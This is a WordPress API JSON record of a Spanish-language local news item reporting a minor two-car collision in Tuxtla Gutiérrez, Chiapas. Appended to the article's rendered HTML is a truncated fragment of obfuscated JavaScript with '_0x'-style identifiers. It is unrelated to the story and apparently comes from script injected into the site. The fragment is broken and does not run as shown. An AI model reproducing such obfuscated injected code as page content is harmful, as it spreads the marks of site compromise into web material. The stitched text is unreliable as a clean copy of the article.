{"id":21619,"date":"2025-04-28T03:06:14","date_gmt":"2025-04-28T03:06:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21619"},"modified":"2025-04-28T03:06:15","modified_gmt":"2025-04-28T03:06:15","slug":"particulares-chocan-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21619","title":{"rendered":"Particulares chocan en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015-1024x576.jpg\" alt=\"\" class=\"wp-image-21620\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0015.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano , 27 de abril del 2025. Tuxtla Guti\u00e9rrez.- Dos unidades particulares protagonizaron un choque este domingo en la 15 Oriente cerca de convivencia infantil.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho cuando un Vw golf de color rojo choc\u00f3 por alcance a un Chevrolet Aveo de color celeste.<\/p>\n\n\n\n<p>Las dos unidades se\u00f1alaron de Norte a Sur pero el Aveo intent\u00f3 dar vuelta en U lo que ocasion\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos para atender a un sujeto que result\u00f3 con heridas leves.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito para presenciar una arreglo armonioso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano , 27 de abril del 2025. Tuxtla Guti\u00e9rrez.- Dos unidades particulares protagonizaron un choque este domingo en la 15 Oriente cerca de convivencia infantil. De acuerdo con los reportes oficiales este hecho cuando un Vw golf de color rojo choc\u00f3 por alcance a un Chevrolet Aveo de color celeste. Las dos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21620,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21619","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21619","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21619"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21619\/revisions"}],"predecessor-version":[{"id":21621,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21619\/revisions\/21621"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21620"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21619"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21619"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21619"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}